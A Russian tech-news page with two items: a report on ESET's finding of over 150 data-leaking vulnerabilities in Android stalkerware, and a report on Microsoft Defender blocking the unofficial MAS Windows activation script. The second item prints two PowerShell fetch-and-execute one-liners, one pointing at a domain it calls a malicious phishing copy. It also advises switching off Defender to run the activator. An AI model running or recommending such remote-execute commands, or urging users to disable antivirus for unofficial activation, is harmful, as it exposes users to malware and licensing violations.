Дыры в stalkerware для Android позволяют слить данные объектов слежки

Екатерина Быстрова 18 Мая 2021 - 10:05

Домашние пользователи

...

Оказывается сталкерский софт (stalkerware) для Android опасен не только с точки зрения целенаправленной слежки за жертвами, но и наличием уязвимостей, которые могут раскрыть ваши данные целой группе третьих лиц. При этом дыры угрожают не только объекту слежки, но и самому оператору.

Новое исследование специалистов антивирусной компании ESET продемонстрировало ряд уязвимостей в Android-версиях так называемых сталкерских программ. Если вы ещё не в курсе, эти приложения разработаны для слежки за объектом.

Разработчики stalkerware обычно позиционируют свой софт как мониторинг активности детей, но все прекрасно понимают, что сталкерские программы часто используются в других целях — не совсем этичных.

Эти приложения позволяют собирать данные о геолокации пользователя мобильного устройства, читать переписки, просматривать историю браузера и фотографии объекта. За последние несколько лет сталкерский софт стал очень популярным.

Эксперты ESET проанализировали 86 Android-приложений, попадающих в категорию stalkerware, и обнаружили в общей сложности более 150 уязвимостей в 58 программах. Эти бреши раскрывают персональные данные пользователя мобильного устройства.

Причём стоит учитывать, что оператор stalkerware — тот, кто следит за своей жертвой — может даже не заметить, что некое третье лицо эксплуатирует уязвимость в софте. Таким образом, за пользователем могут следить сразу несколько сторон, одна из которых способна незаметно слить все персональные данные.

Следующая главная новость »

Подписывайтесь на телеграм-канал AM Live, чтобы всегда быть в курсе самых горячих и свежих новостей. Присоединяйтесь! »

Екатерина Быстрова 09 Января 2026 - 15:02

Windows Microsoft Windows Defender Домашние пользователи Корпорации Защита персональных компьютеров Персональный антивирус Microsoft

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

Оригинальный MAS:
irm https://get.activated.win | iex
Вредоносная подделка:
irm https://get.activate.win | iex
(без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.